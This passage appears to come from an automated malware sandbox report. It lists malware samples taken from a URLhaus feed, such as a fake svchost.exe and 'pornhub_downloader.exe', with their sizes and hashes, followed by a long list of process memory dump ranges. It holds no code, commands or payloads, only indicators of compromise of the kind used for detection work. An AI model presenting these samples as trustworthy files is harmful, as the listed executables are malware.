                                                                                                                          74cf67380449e0d81ba5c15a43ea7fdf703ba7ef

                                                                                                                          SHA256

                                                                                                                          152704e13aba56bccb1183992109216ee3c2d007dfe123ff5762955ecd3b8f00

                                                                                                                          SHA512

                                                                                                                          5bbbb5a1d643b1251ea0dcf4a609e448b4cd91bcb36e737810e48f989954cb243905798eb2c0fbb05ded4f18fc49a92d0330ec981dadc7d5a13ff17ffa04cf8d

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe

                                                                                                                          Filesize

                                                                                                                          1.6MB

                                                                                                                          MD5

                                                                                                                          18cf1b1667f8ca98abcd5e5dceb462e9

                                                                                                                          SHA1

                                                                                                                          62cf7112464e89b9fa725257fb19412db52edafd

                                                                                                                          SHA256

                                                                                                                          56a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3

                                                                                                                          SHA512

                                                                                                                          b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

                                                                                                                          Filesize

                                                                                                                          88KB

                                                                                                                          MD5

                                                                                                                          759f5a6e3daa4972d43bd4a5edbdeb11

                                                                                                                          SHA1

                                                                                                                          36f2ac66b894e4a695f983f3214aace56ffbe2ba

                                                                                                                          SHA256

                                                                                                                          2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

                                                                                                                          SHA512

                                                                                                                          f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\server.exe

                                                                                                                          Filesize

                                                                                                                          638KB

                                                                                                                          MD5

                                                                                                                          ba68862cd484a6af3f41fad64d92f54a

                                                                                                                          SHA1

                                                                                                                          fbc6b891599af7990aafad9f5f22940fabe287b8

                                                                                                                          SHA256

                                                                                                                          53b1cf7d225b8fb9fce279d3c64ee45c9cfbf9fca4d2dfd9e5289872bd16b7a6

                                                                                                                          SHA512

                                                                                                                          c7403879b0233802de5cb5789ac64eaac5e255ee16a6ffc2cb08242f4fe8a772ed9d2e6d8b5f31a83305b6571b0efede2a6710dd1ba1b1c167b293855db85582

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

                                                                                                                          Filesize

                                                                                                                          67KB

                                                                                                                          MD5

                                                                                                                          680ac3eb351fa5695226c02d374440f4

                                                                                                                          SHA1

                                                                                                                          199b9e1c310270c9b376dbb95a4c4165ce0ecd88

                                                                                                                          SHA256

                                                                                                                          4c12ce3f75bb90fba67dd1d3de6c2f6667252810aff265acca97b2ea3c9ef22d

                                                                                                                          SHA512

                                                                                                                          9776ad3884abe406c85a6e5bb80e39bf5200ab483af72c2b7b586ed80eb441a73edc3bda8f071c795a3e8526a2c9f8166e509cb0d7b0caf12f48d14f8ec78bf8

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                          MD5

                                                                                                                          3c124149591abc905e07753ad7bf5a35

                                                                                                                          SHA1

                                                                                                                          c8d0fe2de8882bd26c394b7e602142f6c9674e43

                                                                                                                          SHA256

                                                                                                                          1520fa7e27eb0b310bc83946594251b570f1d4042345eea243010260e7676ac6

                                                                                                                          SHA512

                                                                                                                          67e30eda7eb311a7778c6cde5f1fbec7cd72e00a650f89e2930135ce8861c5128ddc1e463d225eb011bf5359d1f16571f1c6f42ce629c3a76fe586268624911e

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\test.exe

                                                                                                                          Filesize

                                                                                                                          297KB

                                                                                                                          MD5

                                                                                                                          314558f9a6da39ffd12cba6c1064b3b8

                                                                                                                          SHA1

                                                                                                                          2c416cbfa8aeee687534b7c0888d411c0a837c59

                                                                                                                          SHA256

                                                                                                                          64a45b42204cf4412dc2891368a4b72670642a008b13f3d99f6d3d42de95a842

                                                                                                                          SHA512

                                                                                                                          41fdd3cff2e4620c0dfc7adca6a985ba5af69c1e72be409ae8d206534e32e1d3d34358f3f90521f57969c3cdf391442f4dfeba2a174b3abcbe72257d36706947

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe

                                                                                                                          Filesize

                                                                                                                          42KB

                                                                                                                          MD5

                                                                                                                          56944be08ed3307c498123514956095b

                                                                                                                          SHA1

                                                                                                                          53ffb50051da62f2c2cee97fe048a1441e95a812

                                                                                                                          SHA256

                                                                                                                          a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181

                                                                                                                          SHA512

                                                                                                                          aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13

                                                                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

                                                                                                                          Filesize

                                                                                                                          984KB

                                                                                                                          MD5

                                                                                                                          a55d149ef6d095d1499d0668459c236f

                                                                                                                          SHA1

                                                                                                                          f29aae537412267b0ad08a727ccf3a3010eea72b

                                                                                                                          SHA256

                                                                                                                          c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce

                                                                                                                          SHA512

                                                                                                                          2c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b

                                                                                                                        • memory/280-1747-0x00007FF660630000-0x00007FF660A58000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/804-899-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          648KB

                                                                                                                        • memory/804-897-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          648KB

                                                                                                                        • memory/1196-692-0x00007FF9A3AE0000-0x00007FF9A3CE9000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/1196-752-0x00000000041E0000-0x00000000041E2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/1196-823-0x0000000000400000-0x000000000047E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          504KB

                                                                                                                        • memory/1196-718-0x0000000004370000-0x00000000043EF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          508KB

                                                                                                                        • memory/1340-1331-0x00000000072B0000-0x0000000007472000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.8MB

                                                                                                                        • memory/1340-1035-0x0000000000C00000-0x0000000000C52000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          328KB

                                                                                                                        • memory/1340-1332-0x00000000079B0000-0x0000000007EDC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.2MB

                                                                                                                        • memory/1340-1051-0x0000000006720000-0x0000000006D38000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.1MB

                                                                                                                        • memory/1340-1322-0x0000000006F90000-0x0000000006FE0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          320KB

                                                                                                                        • memory/1340-1056-0x0000000005750000-0x0000000005762000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/1340-1055-0x0000000006100000-0x000000000620A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.0MB

                                                                                                                        • memory/1340-1063-0x00000000057E0000-0x000000000581C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/1380-1004-0x00000131AAFA0000-0x00000131AAFC2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/1636-1347-0x0000000000400000-0x000000000066D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.4MB

                                                                                                                        • memory/1636-167-0x0000000000400000-0x000000000066D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.4MB

                                                                                                                        • memory/3316-962-0x000000000E960000-0x000000000E9B6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          344KB

                                                                                                                        • memory/3316-922-0x000000000B570000-0x000000000B5B8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          288KB

                                                                                                                        • memory/3440-920-0x0000000000400000-0x0000000000597000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.6MB

                                                                                                                        • memory/3440-795-0x0000000000400000-0x0000000000597000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.6MB

                                                                                                                        • memory/3540-1320-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3540-1348-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3540-518-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3540-970-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3540-794-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3540-803-0x0000000000400000-0x0000000000833000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.2MB

                                                                                                                        • memory/3584-175-0x0000000140000000-0x0000000140004248-memory.dmp

                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/4088-783-0x00007FF6B0D60000-0x00007FF6B0DDD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          500KB

                                                                                                                        • memory/4252-188-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          356KB

                                                                                                                        • memory/4252-187-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          356KB

                                                                                                                        • memory/4404-882-0x00007FF6A9700000-0x00007FF6A970B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/4404-887-0x00007FF6A9700000-0x00007FF6A970B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/4404-894-0x00007FF6A9700000-0x00007FF6A970B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/4404-881-0x00007FF6A9700000-0x00007FF6A970B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5048-931-0x0000000000400000-0x0000000000413000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          76KB

                                                                                                                        • memory/5624-861-0x00000000067D0000-0x0000000006834000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          400KB

                                                                                                                        • memory/5624-685-0x0000000005510000-0x0000000005522000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/5624-205-0x0000000000730000-0x00000000007C8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          608KB

                                                                                                                        • memory/5624-207-0x00000000058A0000-0x0000000005E46000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/5624-208-0x00000000052F0000-0x0000000005382000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/5624-209-0x0000000005270000-0x000000000527A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/5624-210-0x0000000005560000-0x00000000055FC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          624KB

                                                                                                                        • memory/5628-888-0x00007FF61B830000-0x00007FF61B83B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5628-896-0x00007FF61B830000-0x00007FF61B83B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5628-889-0x00007FF61B830000-0x00007FF61B83B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5628-895-0x00007FF61B830000-0x00007FF61B83B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5724-833-0x00007FF60D440000-0x00007FF60D67A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/5724-834-0x00007FF60D440000-0x00007FF60D67A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/5724-837-0x00007FF60D440000-0x00007FF60D67A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/5956-880-0x00007FF6CAA70000-0x00007FF6CAA7B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5956-875-0x00007FF6CAA70000-0x00007FF6CAA7B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5956-1259-0x00007FF6CAA70000-0x00007FF6CAA7B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/5956-874-0x00007FF6CAA70000-0x00007FF6CAA7B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          44KB

                                                                                                                        • memory/6004-1194-0x00007FF7C1E20000-0x00007FF7C1E2F000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          60KB

                                                                                                                        • memory/6004-1334-0x00007FF7C1E20000-0x00007FF7C1E2F000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          60KB

                                                                                                                        • memory/6076-940-0x0000000071DC0000-0x0000000071E0C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/6076-900-0x0000000002D70000-0x0000000002DA6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          216KB

                                                                                                                        • memory/6076-949-0x0000000006B80000-0x0000000006B9E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/6076-950-0x00000000077A0000-0x0000000007844000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          656KB

                                                                                                                        • memory/6076-989-0x0000000007C10000-0x0000000007C18000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/6076-917-0x0000000006110000-0x0000000006467000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/6076-918-0x0000000006580000-0x000000000659E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/6076-919-0x0000000006630000-0x000000000667C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/6076-939-0x0000000007550000-0x0000000007584000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          208KB

                                                                                                                        • memory/6076-908-0x00000000060A0000-0x0000000006106000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/6076-907-0x0000000005780000-0x00000000057E6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/6076-906-0x00000000056E0000-0x0000000005702000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/6076-905-0x0000000005A70000-0x000000000609A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.2MB

                                                                                                                        • memory/6076-959-0x0000000007F20000-0x000000000859A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.5MB

                                                                                                                        • memory/6076-960-0x00000000078D0000-0x00000000078EA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          104KB

                                                                                                                        • memory/6076-963-0x0000000007950000-0x000000000795A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/6076-964-0x0000000007B60000-0x0000000007BF6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          600KB

                                                                                                                        • memory/6076-969-0x0000000007AE0000-0x0000000007AF1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          68KB

                                                                                                                        • memory/6076-977-0x0000000007B10000-0x0000000007B1E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          56KB

                                                                                                                        • memory/6076-978-0x0000000007B20000-0x0000000007B35000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          84KB

                                                                                                                        • memory/6076-979-0x0000000007C20000-0x0000000007C3A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          104KB